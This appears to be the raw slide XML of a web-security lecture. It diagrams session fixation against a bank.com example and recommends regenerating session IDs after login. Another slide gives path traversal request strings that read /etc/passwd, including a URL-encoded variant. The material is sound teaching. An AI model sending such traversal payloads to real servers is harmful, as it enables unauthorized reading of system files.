          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3591465" y="3358428"/>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(2) session=4242</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934933" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7049040" y="4661644"/>
            <a:ext cx="1409160"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1"/>
                </a:solidFill>
                <a:latin typeface="Eurostile"/>
                <a:cs typeface="Eurostile"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Eurostile"/>
              <a:cs typeface="Eurostile"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="4354126"/>
            <a:ext cx="4740404"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25" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2479175" y="3963432"/>
            <a:ext cx="5356725"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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(3) GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>form.py?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>joe&amp;pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>foo&amp;session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>=4242</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2228610" y="5590116"/>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7" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3021264" y="5123309"/>
            <a:ext cx="3592133"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600" dirty="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(4) GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>balance.py?session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=4242</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2228610" y="5039413"/>
            <a:ext cx="4740404" cy="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29" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3591465" y="4572606"/>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(4) OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18556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49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9" grpId="0" animBg="1"/>
      <p:bldP spid="934920" grpId="0" animBg="1"/>
      <p:bldP spid="934925" grpId="0"/>
      <p:bldP spid="934926" grpId="0"/>
      <p:bldP spid="934933" grpId="0"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0"/>
    </p:bld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US"/>
              <a:t>Session Fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="934916" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="5123309"/>
          <a:ext cx="1219200" cy="812800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s2131" r:id="rId4" imgW="4581525" imgH="3524250" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId4" imgW="4581525" imgH="35242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123309"/>
                        <a:ext cx="1219200" cy="8128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34917" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7315200" y="3218309"/>
          <a:ext cx="520700" cy="1371600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s2132" r:id="rId6" imgW="1511166" imgH="3975234" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId6" imgW="1511166" imgH="397523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18309"/>
                        <a:ext cx="520700" cy="13716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934918" name="Object 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524000" y="2151509"/>
          <a:ext cx="606425" cy="1066800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s2133" r:id="rId8" imgW="2114550" imgH="3705225" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj r:id="rId8" imgW="2114550" imgH="3705225"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151509"/>
                        <a:ext cx="606425" cy="1066800"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:extLst>
                        <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
                          <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                            <a:blipFill dpi="0" rotWithShape="0">
                              <a:blip/>
                              <a:srcRect/>
                              <a:stretch>
                                <a:fillRect/>
                              </a:stretch>
                            </a:blipFill>
                          </a14:hiddenFill>
                        </a:ext>
                      </a:extLst>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934919" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="2227709"/>
            <a:ext cx="4800600"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0" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="2608709"/>
            <a:ext cx="4800600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934921" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3065909"/>
            <a:ext cx="4800600" cy="1066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2" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2362200" y="4361309"/>
            <a:ext cx="4648200" cy="838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3" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="4742309"/>
            <a:ext cx="4648200" cy="8382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4" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3370709"/>
            <a:ext cx="0" cy="15240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34925" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="655346">
            <a:off x="3422875" y="2476031"/>
            <a:ext cx="34575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(1) GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>login.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934926" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="764140">
            <a:off x="3429000" y="2837309"/>
            <a:ext cx="27813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(2) session=55181</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934928" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="752787">
            <a:off x="2703096" y="3321245"/>
            <a:ext cx="490537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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(6) GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>balance.py?session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=55181</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934929" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3675509"/>
            <a:ext cx="4116137" cy="677108"/>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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(3) Attacker lures victim into clicking on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>login.py?session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=55181</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934930" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20991064">
            <a:off x="2281238" y="4437509"/>
            <a:ext cx="44291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latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>(4) GET /login.py?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>session=55181</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934932" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20991064">
            <a:off x="2209800" y="4742309"/>
            <a:ext cx="6194425"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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>(5) GET /form.py?user=joe&amp;pwd=foo&amp;session=55181</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934933" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7049040" y="4661644"/>
            <a:ext cx="1409160" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Eurostile"/>
                <a:cs typeface="Eurostile"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Eurostile"/>
              <a:cs typeface="Eurostile"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934934" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="5961509"/>
            <a:ext cx="1014413"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tx1"/>
                </a:solidFill>
                <a:latin typeface="Eurostile"/>
                <a:cs typeface="Eurostile"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934935" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1618109"/>
            <a:ext cx="1301750" cy="457200"/>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latin typeface="Eurostile"/>
                <a:cs typeface="Eurostile"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180794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9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49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49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49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49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49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349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49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49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349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349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49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9" grpId="0" animBg="1"/>
      <p:bldP spid="934920" grpId="0" animBg="1"/>
      <p:bldP spid="934921" grpId="0" animBg="1"/>
      <p:bldP spid="934922" grpId="0" animBg="1"/>
      <p:bldP spid="934923" grpId="0" animBg="1"/>
      <p:bldP spid="934924" grpId="0" animBg="1"/>
      <p:bldP spid="934925" grpId="0"/>
      <p:bldP spid="934926" grpId="0"/>
      <p:bldP spid="934928" grpId="0"/>
      <p:bldP spid="934929" grpId="0"/>
      <p:bldP spid="934930" grpId="0"/>
      <p:bldP spid="934932" grpId="0"/>
      <p:bldP spid="934933" grpId="0"/>
      <p:bldP spid="934934" grpId="0"/>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5938" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Session Fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="935939" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the application blindly accepts an existing session ID, then the initial setup phase is not necessary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session IDs should always be regenerated after login and never allowed to be “inherited”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session fixation can be composed with cross-site scripting to achieve session id initialization (e.g., by setting the cookie value)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See: M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kolsek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, “Session Fixation Vulnerability in Web-based Applications”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4726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5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5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5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Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>An HTTP request consists of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>resource (derived from the URI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>protocol version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>client information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>body (optional)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256202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2" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672773" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path/directory traversal attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Break out of the document space by using relative paths </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>show.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=../../../../../../etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paths can be encoded, double-encoded, obfuscated, etc:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>show.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=%2e%2e%2f%2e%2e%2fetc%2fpasswd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forceful browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Web application developer assumes that the application will be accessed through links, following the “intended paths”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user, however, is not bound to follow the prescribed links and can “jump” to any publicly available resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatic directory listing abuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The browser may return a listing of the directory if no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file is present and may expose contents that should not be accessible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
